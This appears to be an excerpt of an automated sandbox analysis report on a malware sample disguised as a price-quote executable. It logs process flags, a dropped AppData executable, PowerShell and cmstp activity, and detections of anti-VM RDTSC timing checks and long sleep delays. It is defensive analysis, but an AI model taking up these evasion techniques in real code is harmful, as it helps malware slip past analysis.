Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ySqETqNvdTbE.exe PID: 8176, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000000809904 second address: 000000000080990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 0000000000809B6E second address: 0000000000809B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_16-13983

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe TID: 7520	Thread sleep time: -35529s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe TID: 7568	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe TID: 8180	Thread sleep time: -35529s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe TID: 3828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3900	Thread sleep count: 1287 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3900	Thread sleep time: -2574000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3900	Thread sleep count: 8652 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3900	Thread sleep time: -17304000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 2968	Thread sleep count: 1539 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 2968	Thread sleep time: -3078000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 2968	Thread sleep count: 8432 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 2968	Thread sleep time: -16864000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Code function: 10_2_00409AA0 rdtsc

10_2_00409AA0

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7493	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1583	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1287	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8652	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 884	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 852	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Window / User API: threadDelayed 1539	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Window / User API: threadDelayed 8432	Jump to behavior

